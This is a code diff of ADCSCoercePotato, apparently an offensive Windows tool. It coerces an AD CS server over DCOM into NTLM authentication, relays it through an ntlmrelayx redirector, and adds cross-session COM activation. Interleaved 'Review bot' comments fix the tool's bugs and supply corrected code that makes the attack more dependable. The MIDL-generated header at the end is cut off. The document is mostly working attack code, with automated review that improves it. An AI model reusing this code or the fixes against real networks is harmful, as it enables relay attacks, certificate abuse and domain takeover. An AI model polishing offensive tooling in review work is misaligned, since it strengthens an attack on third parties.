diff --git a/ADCSCoercePotato.cpp b/ADCSCoercePotato.cpp index 12111a2..0ee3c36 100644 --- a/ADCSCoercePotato.cpp +++ b/ADCSCoercePotato.cpp @@ -15,9 +15,11 @@ #include #include #include +#include #include #include "HTTPCrossProtocolRelay.h" +#include "IStandardActivator_h.h" #pragma comment (lib, "Ws2_32.lib") #pragma comment (lib, "Mswsock.lib") @@ -34,15 +36,17 @@ wchar_t* wredir_ip=NULL; wchar_t* wredir_port=NULL; char dcom_port[12]; char dcom_ip[17]; + wchar_t* username=NULL; wchar_t* password=NULL; wchar_t* domain=NULL; static const char VERSION[] = "0.1"; -int g_sessionID = 4; +int g_sessionID = 1337; BOOL TEST_mode = FALSE; HANDLE elevated_token, duped_token; int PotatoAPI::newConnection; +int Pwn(wchar_t* clsid, BOOL brute, int sessionid); wchar_t *processtype = NULL; wchar_t *processargs = NULL; wchar_t *processname = NULL; @@ -89,9 +93,6 @@ void usage() printf("ADCSCoercePotato\n- @decoder_it 2024\n\n", VERSION); printf("Mandatory args: \n" - "-u Domain Username\n" - "-p password\n" - "-d Domain Name\n" "-m remote DCOM (ADCS) server address\n" "-k redirector where socat and ntlmrelayx is running\n" @@ -101,9 +102,11 @@ void usage() printf("Optional args: \n" "-n HTTP port where redirector (ntlmrelayx) is listening, default:80\n" "-l local socket server port, default:9999\n" - "-c default:{D99E6E74-FC88-11D0-B498-00A0C90312F3}" - - + "-c default:{D99E6E74-FC88-11D0-B498-00A0C90312F3}\n" + "-u Domain Username\n" + "-p password\n" + "-d Domain Name\n" + "-s session (it seems not working)\n" ); printf("\n\n"); printf("Example: ADCSCoercePotato.exe -m 192.168.212.22 -k 192.168.1.88 -u myuser -p mypass -d mydomain.domain\n"); @@ -134,6 +137,7 @@ void ParseUsernameFromType3(char* ntlmType3, int ntlmType3Len) { } + PotatoAPI::PotatoAPI() { comSendQ = new BlockingQueue(); rpcSendQ = new BlockingQueue(); 
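Review bot: `int g_sessionID = 1337;` in the `@@ -34,15 +36,17 @@` hunk turns an ordinary session number into the sentinel for "no -s given", so `-s 1337` would silently take the current-session branch in triggerDCOM instead of a cross-session activation. Session IDs are unsigned and start at 0, so a negative value is the unambiguous sentinel: `int g_sessionID = -1;  // -1: no -s given, activate from the caller's own session`, with the matching `if (g_sessionID == 1337)` test in triggerDCOM becoming `if (g_sessionID < 0)`. A one-line comment on the global is worth having in any case, since the comparison lives in a different function and a reader of this declaration cannot tell the value is magic.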
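Review bot: The new optional-args text in the `@@ -101,9 +102,11 @@` hunk lists -u, -p and -d as three independent options, but triggerDCOM calls wcslen() on all three as soon as any one of them is set, so giving only some of them is not a valid combination and the usage line should say so: `"-u Domain Username (requires -p and -d; omit all three to run as the current user)\n"`. The "run as the current user" wording is my reading of the else-branch that just prints GetUserNameW; confirm that `ca.pAuthIdentityData` really stays NULL in that case, as its initialisation is outside this diff. The `(it seems not working)` remark on `-s` belongs in the README or an issue rather than in the usage string shipped to operators.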
@@ -181,7 +185,7 @@ int checkForNewConnection(SOCKET* ListenSocket, SOCKET* ClientSocket) { return 0; } -int PotatoAPI::triggerDCOM(void) +int PotatoAPI::triggerDCOM(int sessionid) { CoInitialize(nullptr); 
@@ -217,38 +221,88 @@ int PotatoAPI::triggerDCOM(void) ca.dwAuthzSvc = RPC_C_AUTHZ_NONE; ca.dwAuthnLevel = RPC_C_AUTHN_LEVEL_DEFAULT; ca.dwImpersonationLevel = RPC_C_IMP_LEVEL_IMPERSONATE; - COAUTHIDENTITY id = { 0 }; - ca.pAuthIdentityData = &id; - id.User = (USHORT*)username; - id.UserLength = wcslen(username); - id.Password = (USHORT*)password; - id.PasswordLength = wcslen(password);; - id.Domain = (USHORT*)domain; - id.DomainLength = wcslen(domain); - id.Flags = SEC_WINNT_AUTH_IDENTITY_UNICODE; + + + if (username != NULL || password != NULL || domain != NULL) { + COAUTHIDENTITY id = { 0 }; + ca.pAuthIdentityData = &id; + id.User = (USHORT*)username; + id.UserLength = wcslen(username); + id.Password = (USHORT*)password; + id.PasswordLength = wcslen(password);; + id.Domain = (USHORT*)domain; + id.DomainLength = wcslen(domain); + id.Flags = SEC_WINNT_AUTH_IDENTITY_UNICODE; + } + else + { + wchar_t username[256] = { 0 }; + DWORD size = sizeof(username); + GetUserNameW(username, &size); + printf("[*] Current user: %ws\n", username); + } + + COSERVERINFO c = { 0 }; c.pwszName = wdcom_ip; c.pAuthInfo = &ca; + SetConsoleOutputCP(CP_UTF8); + CoInitialize(0); CoInitializeEx(0, COINIT_APARTMENTTHREADED); CoInitializeSecurity(0, -1, NULL, NULL, RPC_C_AUTHN_LEVEL_DEFAULT, RPC_C_IMP_LEVEL_IMPERSONATE, NULL, EOAC_NONE, NULL); - HRESULT status=0; + HRESULT status = 0; std::string message = std::system_category().message(status); - - printf("[*] Calling CoGetInstanceFromIStorage with CLSID:%S on remote endpoint:%S\n", olestr, wdcom_ip); + if (g_sessionID == 1337) + { + printf("[*] Pwning from current user session\n"); - status = CoGetInstanceFromIStorage(&c, &clsid, NULL, CLSCTX_REMOTE_SERVER, t, 1, qis); - - - if (status == CO_E_BAD_PATH) - printf("[!] Error. CLSID %S not found. 
Bad path to object.\n", clsid); + wprintf(L"[*] Calling CoGetInstanceFromIStorage with CLSID:%ws on remote endpoint:%ws\n", olestr, wdcom_ip); + + status = CoGetInstanceFromIStorage(&c, &clsid, NULL, CLSCTX_REMOTE_SERVER, t, 1, qis); + + + if (status == CO_E_BAD_PATH) + wprintf(L"[!] Error. CLSID %ws not found. Bad path to object.\n", olestr); + else + { + message = std::system_category().message(status); + //std::cout << "[*] Msg: " << message << std::endl; + printf("[*] Trigger DCOM status: 0x%x\n", status); + } + + fflush(stdout); + } else - printf("[*] Trigger DCOM status: 0x%x - %s\n", status, message.c_str()); - - fflush(stdout); + { + printf("[*] Pwning from session %d\n", g_sessionID); + IStandardActivator* pComAct; + HRESULT r = CoCreateInstance(CLSID_ComActivator, NULL, CLSCTX_INPROC_SERVER, IID_IStandardActivator, (LPVOID*)&pComAct); + ISpecialSystemProperties* pSpecialProperties = NULL; + + r = pComAct->QueryInterface(IID_ISpecialSystemProperties, (void**)&pSpecialProperties); + + r = pSpecialProperties->SetSessionId(g_sessionID, 0, 1); + + printf("[*] Spawning COM object in the session: %d\n", g_sessionID); + wprintf(L"[*] Calling StandardGetInstanceFromIStorage with CLSID:%ws\n", olestr); + + HRESULT status = pComAct->StandardGetInstanceFromIStorage(&c, &clsid, NULL, CLSCTX_REMOTE_SERVER, t, 1, qis); + + if (status == CO_E_BAD_PATH) + printf("[!] Error. CLSID %S not found. Bad path to object.\n", olestr); + else + { + message = std::system_category().message(status); + //std::cout << "[*] Msg: " << message << std::endl; + printf("[*] Trigger DCOM status: 0x%x\n", status); + } + fflush(stdout); + } + return 0; } @@ -393,8 +447,6 @@ void ExtractType3FromRpc(char* rpcPacket, int rpcPacketLen, char* ntlmType3, int memcpy(ntlmType3, rpcPacket + ntlmIndex, *authLen); *ntlmType3Len = (int)*authLen; ParseUsernameFromType3(ntlmType3, *ntlmType3Len); - - } int PotatoAPI::startCOMListener(void) { 
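Review bot: `COAUTHIDENTITY id` is now declared inside the `if (username != NULL || password != NULL || domain != NULL)` block while `ca.pAuthIdentityData = &id` keeps pointing at it, so by the time CoGetInstanceFromIStorage / StandardGetInstanceFromIStorage read `c.pAuthInfo` the identity structure is dead stack space and the credentials the operator passed may or may not reach the wire. The same condition uses `||`, so passing only `-u` reaches `wcslen(password)` on a NULL pointer; the three must be required together. In the new session branch `pComAct` is used without checking the CoCreateInstance result (a failure leaves it NULL and the QueryInterface call dereferences it), `r` from QueryInterface/SetSessionId is never inspected, neither interface is released, and `DWORD size = sizeof(username)` hands GetUserNameW a byte count where it expects a character count. The function begins before the hunk (`ca` is set up above it), and the duplicated `CoInitialize(0); CoInitializeEx(...)` after the `CoInitialize(nullptr)` at the top can simply go.
```cpp
    ca.dwImpersonationLevel = RPC_C_IMP_LEVEL_IMPERSONATE;
    // Must outlive the *GetInstanceFromIStorage calls below: c.pAuthInfo -> ca.pAuthIdentityData points here.
    COAUTHIDENTITY id = { 0 };
    if (username != NULL && password != NULL && domain != NULL) {
        ca.pAuthIdentityData = &id;
        id.User = (USHORT*)username;
        id.UserLength = (ULONG)wcslen(username);
        id.Password = (USHORT*)password;
        id.PasswordLength = (ULONG)wcslen(password);
        id.Domain = (USHORT*)domain;
        id.DomainLength = (ULONG)wcslen(domain);
        id.Flags = SEC_WINNT_AUTH_IDENTITY_UNICODE;
    }
    else if (username != NULL || password != NULL || domain != NULL) {
        printf("[!] -u, -p and -d must be given together\n");
        return -1;
    }
    else {
        wchar_t currentUser[256] = { 0 };
        DWORD size = _countof(currentUser);   // GetUserNameW takes a character count, not sizeof()
        GetUserNameW(currentUser, &size);
        printf("[*] Current user: %ws\n", currentUser);
    }
    // … unchanged: COSERVERINFO setup, CoInitializeSecurity, current-session branch …
    else
    {
        printf("[*] Pwning from session %d\n", g_sessionID);
        IStandardActivator* pComAct = NULL;
        HRESULT r = CoCreateInstance(CLSID_ComActivator, NULL, CLSCTX_INPROC_SERVER, IID_IStandardActivator, (LPVOID*)&pComAct);
        if (FAILED(r) || pComAct == NULL) {
            printf("[!] CoCreateInstance(CLSID_ComActivator) failed: 0x%x\n", r);
            return -1;
        }
        ISpecialSystemProperties* pSpecialProperties = NULL;
        r = pComAct->QueryInterface(IID_ISpecialSystemProperties, (void**)&pSpecialProperties);
        if (FAILED(r) || pSpecialProperties == NULL) {
            printf("[!] QueryInterface(ISpecialSystemProperties) failed: 0x%x\n", r);
            pComAct->Release();
            return -1;
        }
        r = pSpecialProperties->SetSessionId(g_sessionID, 0, 1);
        if (FAILED(r))
            printf("[!] SetSessionId(%d) failed: 0x%x\n", g_sessionID, r);   // activation will fall back to the caller's session
        // … unchanged: StandardGetInstanceFromIStorage call and status reporting …
        pSpecialProperties->Release();
        pComAct->Release();
    }
```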
@@ -668,6 +720,12 @@ int wmain(int argc, wchar_t** argv) olestr = argv[1]; break; + case 's': + ++argv; + --argc; + g_sessionID = _wtoi(argv[1]); + printf("Initialized session id %d\n", g_sessionID); + break; case 'm': ++argv; @@ -711,22 +769,21 @@ int wmain(int argc, wchar_t** argv) { wredir_port = L"80"; } - if(wdcom_ip == NULL || wredir_ip==NULL ||domain==NULL || username==NULL || password==NULL) - - + if(wdcom_ip == NULL || wredir_ip==NULL) { usage(); exit(-1); } - // Fallback to default BITS CLSID + // Fallback to default CLSID Of CertSrv Request if (olestr == NULL) olestr = L"{D99E6E74-FC88-11D0-B498-00A0C90312F3}"; - exit(Juicy(NULL, FALSE)); + Pwn(NULL, FALSE, g_sessionID); + return 0; } -int Juicy(wchar_t *clsid, BOOL brute) +int Pwn(wchar_t *clsid, BOOL brute, int sessionid) { PotatoAPI* test = new PotatoAPI(); test->startCOMListenerThread(); @@ -739,7 +796,7 @@ int Juicy(wchar_t *clsid, BOOL brute) test->startRPCConnectionThread(); - test->triggerDCOM(); + test->triggerDCOM(sessionid); return 1; diff --git a/ADCSCoercePotato.vcxproj b/ADCSCoercePotato.vcxproj index a3ad3d0..1a74b96 100644 --- a/ADCSCoercePotato.vcxproj +++ b/ADCSCoercePotato.vcxproj @@ -48,7 +48,7 @@ Application false - v143 + v142 true Unicode @@ -137,7 +137,7 @@ Level3 NotUsing - MaxSpeed + Disabled true true NDEBUG;_WINDOWS;_USRDLL;MSFROTTENPOTATO_EXPORTS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions) @@ -162,6 +162,7 @@ + @@ -173,6 +174,9 @@ + + + diff --git a/ADCSCoercePotato.vcxproj.user b/ADCSCoercePotato.vcxproj.user index 0f14913..50d9b55 100644 --- a/ADCSCoercePotato.vcxproj.user +++ b/ADCSCoercePotato.vcxproj.user @@ -1,4 +1,7 @@  - + + -m 172.16.0.3 -k 172.16.0.5 -s 2 -c {f8842f8e-dafe-4b37-9d38-4e0714a61149} + WindowsLocalDebugger + \ No newline at end of file diff --git a/IStandardActivator.idl b/IStandardActivator.idl new file mode 100644 index 0000000..db80401 --- /dev/null +++ b/IStandardActivator.idl 
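Review bot: `g_sessionID = _wtoi(argv[1]);` in the new `case 's'` accepts any text: `_wtoi` returns 0 for non-numeric input, so a typo such as `-s two` silently targets session 0, and a negative value is stored into what ISpecialSystemProperties::SetSessionId declares as a ULONG. When `-s` is the last argument `argv[1]` is the terminating NULL; the neighbouring cases appear to follow the same pattern, but this one now drives an activation path and is worth closing. Parse with wcstol and reject anything that is not a non-negative integer.
```cpp
case 's':
    ++argv;
    --argc;
    {
        wchar_t* end = NULL;
        long sid = (argv[1] != NULL) ? wcstol(argv[1], &end, 10) : -1;
        if (argv[1] == NULL || *argv[1] == L'\0' || *end != L'\0' || sid < 0) {
            printf("[!] -s expects a non-negative session id\n");
            usage();
            exit(-1);
        }
        g_sessionID = (int)sid;
    }
    printf("Initialized session id %d\n", g_sessionID);
    break;
```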
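Review bot: The relaxed check `if(wdcom_ip == NULL || wredir_ip==NULL)` in the `@@ -711,22 +769,21 @@` hunk no longer enforces that -u, -p and -d arrive as a set, and triggerDCOM dereferences all three as soon as one of them is present, so a partial set now crashes instead of printing usage. Add an all-or-none test beside it: `BOOL anyCred = username || password || domain, allCred = username && password && domain;` and `if (wdcom_ip == NULL || wredir_ip == NULL || (anyCred && !allCred)) { usage(); exit(-1); }`. Replacing `exit(Juicy(NULL, FALSE))` with `Pwn(NULL, FALSE, g_sessionID); return 0;` also discards Pwn's return value — always 1 today per the `@@ -739` hunk, but `return Pwn(NULL, FALSE, g_sessionID);` keeps the exit code tied to it if a failure path is ever added.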
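Review bot: The ADCSCoercePotato.vcxproj hunk switches `<Optimization>` from `MaxSpeed` to `Disabled` in the configuration whose defines include `NDEBUG;_WINDOWS;...`, i.e. the release build, which reads like a leftover from stepping through the new session path rather than an intended change. The toolset downgrade `v143` → `v142` is likewise unexplained. I would restore `<Optimization>MaxSpeed</Optimization>` and, if the toolset change is deliberate, state the reason in the commit message.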
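Review bot: ADCSCoercePotato.vcxproj.user is a per-developer local-settings file and this hunk commits debugger arguments (`-m 172.16.0.3 -k 172.16.0.5 -s 2 -c {f8842f8e-...}`) that only make sense in the author's lab. It should be removed from the repository and listed in .gitignore rather than tracked, so that local targets and CLSIDs do not keep leaking into the history.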
@@ -0,0 +1,68 @@ +import "oaidl.idl"; +import "ocidl.idl"; + +[ + object, + local, + uuid(000001b8-0000-0000-C000-000000000046), + pointer_default(unique) +] +interface IStandardActivator : IUnknown +{ + HRESULT StandardGetClassObject([in] REFCLSID rclsid, + [in] DWORD dwClsCtx, + [in] COSERVERINFO* pServerInfo, + [in] REFIID riid, + [out, iid_is(riid)] void** ppv); + + HRESULT StandardCreateInstance([in] REFCLSID Clsid, + [in] IUnknown* punkOuter, + [in] DWORD dwClsCtx, + [in] COSERVERINFO* pServerInfo, + [in] DWORD dwCount, + [in, size_is(dwCount)] MULTI_QI* pResults); + + HRESULT StandardGetInstanceFromFile( + [in] COSERVERINFO* pServerInfo, + [in] CLSID* pclsidOverride, + [in] IUnknown* punkOuter, + [in] DWORD dwClsCtx, + [in] DWORD grfMode, + [in] OLECHAR* pwszName, + [in] DWORD dwCount, + [in, size_is(dwCount)] MULTI_QI* pResults); + + HRESULT StandardGetInstanceFromIStorage( + [in] COSERVERINFO* pServerInfo, + [in] CLSID* pclsidOverride, + [in] IUnknown* punkOuter, + [in] DWORD dwClsCtx, + [in] IStorage* pstg, + [in] DWORD dwCount, + [in, size_is(dwCount)] MULTI_QI* pResults); + + HRESULT Reset(); +} + +[ + object, + local, + uuid(000001b9-0000-0000-C000-000000000046), + pointer_default(unique) +] +interface ISpecialSystemProperties : IUnknown +{ + HRESULT SetSessionId([in] ULONG dwSessionId, [in]BOOL bUseConsole, [in] BOOL fRemoteThisSessionId); + HRESULT GetSessionId([out] ULONG* pdwSessionId, [out]BOOL* pbUseConsole); + HRESULT GetSessionId2([out] ULONG* pdwSessionId, [out]BOOL* pbUseConsole, [out] BOOL* pfRemoteThisSessionId); + HRESULT SetClientImpersonating([in]BOOL fClientImpersonating); + HRESULT GetClientImpersonating([out]BOOL* pfClientImpersonating); + HRESULT SetPartitionId([in] REFGUID guidPartiton); + HRESULT GetPartitionId([out] GUID* pguidPartiton); + HRESULT SetProcessRequestType([in] DWORD dwPRT); + HRESULT GetProcessRequestType([out] DWORD* pdwPRT); + HRESULT SetOrigClsctx([in] DWORD dwClsctx); + HRESULT GetOrigClsctx([out] DWORD* 
dwClsctx); + HRESULT GetDefaultAuthenticationLevel([out] DWORD* pdwAuthnLevel); + HRESULT SetDefaultAuthenticationLevel([in] DWORD dwAuthnLevel); +} diff --git a/IStandardActivator_h.h b/IStandardActivator_h.h new file mode 100644 index 0000000..687c5af --- /dev/null +++ b/IStandardActivator_h.h 
@@ -0,0 +1,452 @@ + + +/* this ALWAYS GENERATED file contains the definitions for the interfaces */ + + + /* File created by MIDL compiler version 8.01.0622 */ +/* at Tue Jan 19 06:14:07 2038 + */ +/* Compiler settings for IStandardActivator.idl: + Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622 + protocol : all , ms_ext, c_ext, robust + error checks: allocation ref bounds_check enum stub_data + VC __declspec() decoration level: + __declspec(uuid()), __declspec(selectany), __declspec(novtable) + DECLSPEC_UUID(), MIDL_INTERFACE() +*/ +/* @@MIDL_FILE_HEADING( ) */ + + + +/* verify that the version is high enough to compile this file*/ +#ifndef __REQUIRED_RPCNDR_H_VERSION__ +#define __REQUIRED_RPCNDR_H_VERSION__ 500 +#endif + +#include "rpc.h" +#include "rpcndr.h" + +#ifndef __RPCNDR_H_VERSION__ +#error this stub requires an updated version of +#endif /* __RPCNDR_H_VERSION__ */ + +#ifndef COM_NO_WINDOWS_H +#include "windows.h" +#include "ole2.h" +#endif /*COM_NO_WINDOWS_H*/ + +#ifndef __IStandardActivator_h_h__ +#define __IStandardActivator_h_h__ + +#if defined(_MSC_VER) && (_MSC_VER >= 1020) +#pragma once +#endif + +/* Forward Declarations */ + +#ifndef __IStandardActivator_FWD_DEFINED__ +#define __IStandardActivator_FWD_DEFINED__ +typedef interface IStandardActivator IStandardActivator; + +#endif /* __IStandardActivator_FWD_DEFINED__ */ + + +#ifndef __ISpecialSystemProperties_FWD_DEFINED__ +#define __ISpecialSystemProperties_FWD_DEFINED__ +typedef interface ISpecialSystemProperties ISpecialSystemProperties; + +#endif /* __ISpecialSystemProperties_FWD_DEFINED__ */ + + +/* header files for imported files */ +#include "oaidl.h" +#include "ocidl.h" + +#ifdef __cplusplus +extern "C"{ +#endif + + +#ifndef __IStandardActivator_INTERFACE_DEFINED__ +#define __IStandardActivator_INTERFACE_DEFINED__ + +/* interface IStandardActivator */ +/* [unique][uuid][local][object] */ + + +EXTERN_C const IID IID_IStandardActivator; + +#if defined(__cplusplus) && 
!defined(CINTERFACE) + + MIDL_INTERFACE("000001b8-0000-0000-C000-000000000046") + IStandardActivator : public IUnknown + { + public: + virtual HRESULT STDMETHODCALLTYPE StandardGetClassObject( + /* [in] */ REFCLSID rclsid, + /* [in] */ DWORD dwClsCtx, + /* [in] */ COSERVERINFO *pServerInfo, + /* [in] */ REFIID riid, + /* [iid_is][out] */ void **ppv) = 0; + + virtual HRESULT STDMETHODCALLTYPE StandardCreateInstance( + /* [in] */ REFCLSID Clsid, + /* [in] */ IUnknown *punkOuter, + /* [in] */ DWORD dwClsCtx, + /* [in] */ COSERVERINFO *pServerInfo, + /* [in] */ DWORD dwCount, + /* [size_is][in] */ MULTI_QI *pResults) = 0; + + virtual HRESULT STDMETHODCALLTYPE StandardGetInstanceFromFile( + /* [in] */ COSERVERINFO *pServerInfo, + /* [in] */ CLSID *pclsidOverride, + /* [in] */ IUnknown *punkOuter, + /* [in] */ DWORD dwClsCtx, + /* [in] */ DWORD grfMode, + /* [in] */ OLECHAR *pwszName, + /* [in] */ DWORD dwCount, + /* [size_is][in] */ MULTI_QI *pResults) = 0; + + virtual HRESULT STDMETHODCALLTYPE StandardGetInstanceFromIStorage( + /* [in] */ COSERVERINFO *pServerInfo, + /* [in] */ CLSID *pclsidOverride, + /* [in] */ IUnknown *punkOuter, + /* [in] */ DWORD dwClsCtx, + /* [in] */ IStorage *pstg, + /* [in] */ DWORD dwCount, + /* [size_is][in] */ MULTI_QI *pResults) = 0; + + virtual HRESULT STDMETHODCALLTYPE Reset( void) = 0; + + }; + + +#else /* C style interface */ + + typedef struct IStandardActivatorVtbl + { + BEGIN_INTERFACE + + HRESULT ( STDMETHODCALLTYPE *QueryInterface )( + IStandardActivator * This, + /* [in] */ REFIID riid, + /* [annotation][iid_is][out] */ + _COM_Outptr_ void **ppvObject); + + ULONG ( STDMETHODCALLTYPE *AddRef )( + IStandardActivator * This); + + ULONG ( STDMETHODCALLTYPE *Release )( + IStandardActivator * This); + + HRESULT ( STDMETHODCALLTYPE *StandardGetClassObject )( + IStandardActivator * This, + /* [in] */ REFCLSID rclsid, + /* [in] */ DWORD dwClsCtx, + /* [in] */ COSERVERINFO *pServerInfo, + /* [in] */ REFIID riid, + /* [iid_is][out] */ void 
**ppv); + + HRESULT ( STDMETHODCALLTYPE *StandardCreateInstance )( + IStandardActivator * This, + /* [in] */ REFCLSID Clsid, + /* [in] */ IUnknown *punkOuter, + /* [in] */ DWORD dwClsCtx, + /* [in] */ COSERVERINFO *pServerInfo, + /* [in] */ DWORD dwCount, + /* [size_is][in] */ MULTI_QI *pResults); + + HRESULT ( STDMETHODCALLTYPE *StandardGetInstanceFromFile )( + IStandardActivator * This, + /* [in] */ COSERVERINFO *pServerInfo, + /* [in] */ CLSID *pclsidOverride, + /* [in] */ IUnknown *punkOuter, + /* [in] */ DWORD dwClsCtx, + /* [in] */ DWORD grfMode, + /* [in] */ OLECHAR *pwszName, + /* [in] */ DWORD dwCount, + /* [size_is][in] */ MULTI_QI *pResults); + + HRESULT ( STDMETHODCALLTYPE *StandardGetInstanceFromIStorage )( + IStandardActivator * This, + /* [in] */ COSERVERINFO *pServerInfo, + /* [in] */ CLSID *pclsidOverride, + /* [in] */ IUnknown *punkOuter, + /* [in] */ DWORD dwClsCtx, + /* [in] */ IStorage *pstg, + /* [in] */ DWORD dwCount, + /* [size_is][in] */ MULTI_QI *pResults); + + HRESULT ( STDMETHODCALLTYPE *Reset )( + IStandardActivator * This); + + END_INTERFACE + } IStandardActivatorVtbl; + + interface IStandardActivator + { + CONST_VTBL struct IStandardActivatorVtbl *lpVtbl; + }; + + + +#ifdef COBJMACROS + + +#define IStandardActivator_QueryInterface(This,riid,ppvObject) \ + ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) + +#define IStandardActivator_AddRef(This) \ + ( (This)->lpVtbl -> AddRef(This) ) + +#define IStandardActivator_Release(This) \ + ( (This)->lpVtbl -> Release(This) ) + + +#define IStandardActivator_StandardGetClassObject(This,rclsid,dwClsCtx,pServerInfo,riid,ppv) \ + ( (This)->lpVtbl -> StandardGetClassObject(This,rclsid,dwClsCtx,pServerInfo,riid,ppv) ) + +#define IStandardActivator_StandardCreateInstance(This,Clsid,punkOuter,dwClsCtx,pServerInfo,dwCount,pResults) \ + ( (This)->lpVtbl -> StandardCreateInstance(This,Clsid,punkOuter,dwClsCtx,pServerInfo,dwCount,pResults) ) + +#define 
IStandardActivator_StandardGetInstanceFromFile(This,pServerInfo,pclsidOverride,punkOuter,dwClsCtx,grfMode,pwszName,dwCount,pResults) \ + ( (This)->lpVtbl -> StandardGetInstanceFromFile(This,pServerInfo,pclsidOverride,punkOuter,dwClsCtx,grfMode,pwszName,dwCount,pResults) ) + +#define IStandardActivator_StandardGetInstanceFromIStorage(This,pServerInfo,pclsidOverride,punkOuter,dwClsCtx,pstg,dwCount,pResults) \ + ( (This)->lpVtbl -> StandardGetInstanceFromIStorage(This,pServerInfo,pclsidOverride,punkOuter,dwClsCtx,pstg,dwCount,pResults) ) + +#define IStandardActivator_Reset(This) \ + ( (This)->lpVtbl -> Reset(This) ) + +#endif /* COBJMACROS */ + + +#endif /* C style interface */ + + + + +#endif /* __IStandardActivator_INTERFACE_DEFINED__ */ + + +#ifndef __ISpecialSystemProperties_INTERFACE_DEFINED__ +#define __ISpecialSystemProperties_INTERFACE_DEFINED__ + +/* interface ISpecialSystemProperties */ +/* [unique][uuid][local][object] */ + + +EXTERN_C const IID IID_ISpecialSystemProperties; + +#if defined(__cplusplus) && !defined(CINTERFACE) + + MIDL_INTERFACE("000001b9-0000-0000-C000-000000000046") + ISpecialSystemProperties : public IUnknown + { + public: + virtual HRESULT STDMETHODCALLTYPE SetSessionId( + /* [in] */ ULONG dwSessionId, + /* [in] */ BOOL bUseConsole, + /* [in] */ BOOL fRemoteThisSessionId) = 0; + + virtual HRESULT STDMETHODCALLTYPE GetSessionId( + /* [out] */ ULONG *pdwSessionId, + /* [out] */ BOOL *pbUseConsole) = 0; + + virtual HRESULT STDMETHODCALLTYPE GetSessionId2( + /* [out] */ ULONG *pdwSessionId, + /* [out] */ BOOL *pbUseConsole, + /* [out] */ BOOL *pfRemoteThisSessionId) = 0; + + virtual HRESULT STDMETHODCALLTYPE SetClientImpersonating( + /* [in] */ BOOL fClientImpersonating) = 0; + + virtual HRESULT STDMETHODCALLTYPE GetClientImpersonating( + /* [out] */ BOOL *pfClientImpersonating) = 0; + + virtual HRESULT STDMETHODCALLTYPE SetPartitionId( + /* [in] */ REFGUID guidPartiton) = 0; + + virtual HRESULT STDMETHODCALLTYPE GetPartitionId( + /* [out] 
*/ GUID *pguidPartiton) = 0; + + virtual HRESULT STDMETHODCALLTYPE SetProcessRequestType( + /* [in] */ DWORD dwPRT) = 0; + + virtual HRESULT STDMETHODCALLTYPE GetProcessRequestType( + /* [out] */ DWORD *pdwPRT) = 0; + + virtual HRESULT STDMETHODCALLTYPE SetOrigClsctx( + /* [in] */ DWORD dwClsctx) = 0; + + virtual HRESULT STDMETHODCALLTYPE GetOrigClsctx( + /* [out] */ DWORD *dwClsctx) = 0; + + virtual HRESULT STDMETHODCALLTYPE GetDefaultAuthenticationLevel( + /* [out] */ DWORD *pdwAuthnLevel) = 0; + + virtual HRESULT STDMETHODCALLTYPE SetDefaultAuthenticationLevel( + /* [in] */ DWORD dwAuthnLevel) = 0; + + }; + + +#else /* C style interface */ + + typedef struct ISpecialSystemPropertiesVtbl + { + BEGIN_INTERFACE + + HRESULT ( STDMETHODCALLTYPE *QueryInterface )( + ISpecialSystemProperties * This, + /* [in] */ REFIID riid, + /* [annotation][iid_is][out] */ + _COM_Outptr_ void **ppvObject); + + ULONG ( STDMETHODCALLTYPE *AddRef )( + ISpecialSystemProperties * This); + + ULONG ( STDMETHODCALLTYPE *Release )( + ISpecialSystemProperties * This); + + HRESULT ( STDMETHODCALLTYPE *SetSessionId )( + ISpecialSystemProperties * This, + /* [in] */ ULONG dwSessionId, + /* [in] */ BOOL bUseConsole, + /* [in] */ BOOL fRemoteThisSessionId); + + HRESULT ( STDMETHODCALLTYPE *GetSessionId )( + ISpecialSystemProperties * This, + /* [out] */ ULONG *pdwSessionId, + /* [out] */ BOOL *pbUseConsole); + + HRESULT ( STDMETHODCALLTYPE *GetSessionId2 )( + ISpecialSystemProperties * This, + /* [out] */ ULONG *pdwSessionId, + /* [out] */ BOOL *pbUseConsole, + /* [out] */ BOOL *pfRemoteThisSessionId); + + HRESULT ( STDMETHODCALLTYPE *SetClientImpersonating )( + ISpecialSystemProperties * This, + /* [in] */ BOOL fClientImpersonating); + + HRESULT ( STDMETHODCALLTYPE *GetClientImpersonating )( + ISpecialSystemProperties * This, + /* [out] */ BOOL *pfClientImpersonating); + + HRESULT ( STDMETHODCALLTYPE *SetPartitionId )( + ISpecialSystemProperties * This, + /* [in] */ REFGUID guidPartiton); + + 
HRESULT ( STDMETHODCALLTYPE *GetPartitionId )( + ISpecialSystemProperties * This, + /* [out] */ GUID *pguidPartiton); + + HRESULT ( STDMETHODCALLTYPE *SetProcessRequestType )( + ISpecialSystemProperties * This, + /* [in] */ DWORD dwPRT); + + HRESULT ( STDMETHODCALLTYPE *GetProcessRequestType )( + ISpecialSystemProperties * This, + /* [out] */ DWORD *pdwPRT); + + HRESULT ( STDMETHODCALLTYPE *SetOrigClsctx )( + ISpecialSystemProperties * This, + /* [in] */ DWORD dwClsctx); + + HRESULT ( STDMETHODCALLTYPE *GetOrigClsctx )( + ISpecialSystemProperties * This, + /* [out] */ DWORD *dwClsctx); + + HRESULT ( STDMETHODCALLTYPE *GetDefaultAuthenticationLevel )( + ISpecialSystemProperties * This, + /* [out] */ DWORD *pdwAuthnLevel); + + HRESULT ( STDMETHODCALLTYPE *SetDefaultAuthenticationLevel )( + ISpecialSystemProperties * This, + /* [in] */ DWORD dwAuthnLevel); + + END_INTERFACE + } ISpecialSystemPropertiesVtbl; + + interface ISpecialSystemProperties + { + CONST_VTBL struct ISpecialSystemPropertiesVtbl *lpVtbl; + }; + + + +#ifdef COBJMACROS + + +#define ISpecialSystemProperties_QueryInterface(This,riid,ppvObject) \ + ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) + +#define ISpecialSystemProperties_AddRef(This) \ + ( (This)->lpVtbl -> AddRef(This) ) + +#define ISpecialSystemProperties_Release(This) \ + ( (This)->lpVtbl -> Release(This) ) + + +#define ISpecialSystemProperties_SetSessionId(This,dwSessionId,bUseConsole,fRemoteThisSessionId) \ + ( (This)->lpVtbl -> SetSessionId(This,dwSessionId,bUseConsole,fRemoteThisSessionId) ) + +#define ISpecialSystemProperties_GetSessionId(This,pdwSessionId,pbUseConsole) \ + ( (This)->lpVtbl -> GetSessionId(This,pdwSessionId,pbUseConsole) ) + +#define 